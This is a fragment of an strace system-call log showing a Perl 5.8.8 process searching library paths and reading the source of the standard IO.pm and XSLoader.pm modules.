7625  07:19:37.978192 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbfbda12c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978204 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbfbda03c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978217 stat64("/usr/lib/perl5/IO.pmc", 0xbfbda12c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978229 stat64("/usr/lib/perl5/IO.pm", 0xbfbda03c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978242 stat64("/usr/share/perl5/IO.pmc", 0xbfbda12c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978253 stat64("/usr/share/perl5/IO.pm", 0xbfbda03c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978266 stat64("/usr/lib/perl/5.8/IO.pmc", 0xbfbda12c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978278 stat64("/usr/lib/perl/5.8/IO.pm", {st_mode=S_IFREG|0644, st_size=413, ...}) = 0

7625  07:19:37.978298 open("/usr/lib/perl/5.8/IO.pm", O_RDONLY|O_LARGEFILE) = 6

7625  07:19:37.978312 ioctl(6, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbd9e48) = -1 ENOTTY (Inappropriate ioctl for device)

7625  07:19:37.978323 _llseek(6, 0, [0], SEEK_CUR) = 0

7625  07:19:37.978345 read(6, "#\n\npackage IO;\n\nuse XSLoader ();\nuse Carp;\nuse strict;\nuse warnings;\n\nour $VERSION = \"1.22\";\nXSLoader::load \'IO\', $VERSION;\n\nsub import {\n    shift;\n\n    warnings::warnif(\'deprecated\', qq{Parameterless \"use IO\" deprecated})\n        if @_ == 0 ;\n    \n    my @l = @_ ? @_ : qw(Handle Seekable File Pipe Socket Dir);\n\n    eval join(\"\", map { \"require IO::\" . (/(\\w+)/)[0] . \";\\n\" } @l)\n\tor croak $@;\n}\n\n1;\n\n__END__\n\n", 4096) = 413

7625  07:19:37.978400 stat64("/etc/perl/XSLoader.pmc", 0xbfbd9c7c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978413 stat64("/etc/perl/XSLoader.pm", 0xbfbd9b8c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978426 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pmc", 0xbfbd9c7c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978438 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pm", 0xbfbd9b8c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978489 stat64("/usr/local/share/perl/5.8.8/XSLoader.pmc", 0xbfbd9c7c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978503 stat64("/usr/local/share/perl/5.8.8/XSLoader.pm", 0xbfbd9b8c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978538 stat64("/usr/lib/perl5/XSLoader.pmc", 0xbfbd9c7c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978549 stat64("/usr/lib/perl5/XSLoader.pm", 0xbfbd9b8c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978562 stat64("/usr/share/perl5/XSLoader.pmc", 0xbfbd9c7c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978574 stat64("/usr/share/perl5/XSLoader.pm", 0xbfbd9b8c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978587 stat64("/usr/lib/perl/5.8/XSLoader.pmc", 0xbfbd9c7c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978599 stat64("/usr/lib/perl/5.8/XSLoader.pm", {st_mode=S_IFREG|0644, st_size=3408, ...}) = 0

7625  07:19:37.978619 open("/usr/lib/perl/5.8/XSLoader.pm", O_RDONLY|O_LARGEFILE) = 8

7625  07:19:37.978633 ioctl(8, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbd9998) = -1 ENOTTY (Inappropriate ioctl for device)

7625  07:19:37.978644 _llseek(8, 0, [0], SEEK_CUR) = 0

7625  07:19:37.978662 read(8, "# Generated from XSLoader.pm.PL (resolved %Config::Config value)\n\npackage XSLoader;\n\n$VERSION = \"0.06\";\n\n#use strict;\n\n# enable debug/trace messages from DynaLoader perl code\n# $dl_debug = $ENV{PERL_DL_DEBUG} || 0 unless defined $dl_debug;\n\n  my $dl_dlext = \'so\';\n\npackage DynaLoader;\n\n# No prizes for guessing why we don\'t say \'bootstrap DynaLoader;\' here.\n# NOTE: All dl_*.xs (including dl_none.xs) define a dl_error() XSUB\nboot_DynaLoader(\'DynaLoader\') if defined(&boot_DynaLoader) &&\n                                !defined(&dl_error);\npackage XSLoader;\n\nsub load {\n    package DynaLoader;\n\n    die q{XSLoader::load(\'Your::Module\', $Your::Module::VERSION)} unless @_;\n\n    my($module) = $_[0];\n\n    # work with static linking too\n    my $b = \"$module\\::bootstrap\";\n    goto &$b if defined &$b;\n\n    goto retry unless $module and defined &dl_load_file;\n\n    my @modparts = split(/::/,$module);\n    my $modfname = $modparts[-1];\n\n    my $modpname = join(\'/\',@modparts);\n    my $modlibname = (caller())[1];\n    my $c = @modparts;\n    $modlibname =~ s,[\\\\/][^\\\\/]+$,, while $c--;\t# Q&D basename\n    my $file = \"$modlibname/auto/$modpname/$modfname.$dl_dlext\";\n\n#   print STDERR \"XSLoader::load for $module ($file)\\n\" if $dl_debug;\n\n    my $bs = $file;\n    $bs =~ s/(\\.\\w+)?(;\\d*)?$/\\.bs/; # look for .bs \'beside\' the library\n\n    goto retry if not -f $file or -s $bs;\n\n    my $bootname = \"boot_$module\";\n    $bootname =~ s/\\W/_/g;\n    @DynaLoader::dl_require_symbols = ($bootname);\n\n    my $boot_symbol_ref;\n\n    if ($^O eq \'darwin\') {\n        if ($boot_symbol_ref = dl_find_symbol(0, $bootname)) {\n            goto boot; #extension library has already been loaded, e.g. darwin\n        }\n    }\n\n    # Many dynamic extension loading problems will appear to come from\n    # this section of code: XYZ failed at line 123 of DynaLoader.pm.\n    # Often these errors are actually occurring in the initialisation\n    # C code of the extension XS file. Perl reports the error as being\n    # in this perl code simply because this was the last perl code\n    # it executed.\n\n    my $libref = dl_load_file($file, 0) or do { \n        require Carp;\n        Carp::croak(\"Can\'t load \'$file\' for module $module: \" . dl_error());\n    };\n    push(@DynaLoader::dl_librefs,$libref);  # record loaded object\n\n    my @unresolved = dl_undef_symbols();\n    if (@unresolved) {\n        require Carp;\n        Carp::carp(\"Undefined symbols present after loading $file: @unresolved\\n\");\n    }\n\n    $boot_symbol_ref = dl_find_symbol($libref, $bootname) or do {\n        require Carp;\n        Carp::croak(\"Can\'t find \'$bootname\' symbol in $file\\n\");\n    };\n\n    push(@DynaLoader::dl_modules, $module); # record loaded module\n\n  boot:\n    my $xs = dl_install_xsub(\"${module}::bootstrap\", $boot_symbol_ref, $file);\n\n    # See comment block above\n    return &$xs(@_);\n\n  retry:\n    my $bootstrap_inherit = DynaLoader->can(\'bootstrap_inherit\') || \n                            XSLoader->can(\'bootstrap_inherit\');\n    goto &$bootstrap_inherit;\n}\n\n# Versions of DynaLoader prior to 5.6.0 don\'t have this function.\nsub bootstrap_inherit {\n    package DynaLoader;\n\n    my $module = $_[0];\n    local *DynaLoader::isa = *{\"$module\\::ISA\"};\n    local @DynaLoader::isa = (@DynaLoader::isa, \'DynaLoader\');\n    # Cannot goto due to delocalization.  Will report errors on a wrong line?\n    require DynaLoader;\n    DynaLoader::bootstrap(@_);\n}\n\n1;\n\n__END__\n\n", 4096) = 3408

7625  07:19:37.978894 brk(0x8195000)    = 0x8195000

7625  07:19:37.979247 _llseek(8, 3407, [3407], SEEK_SET) = 0

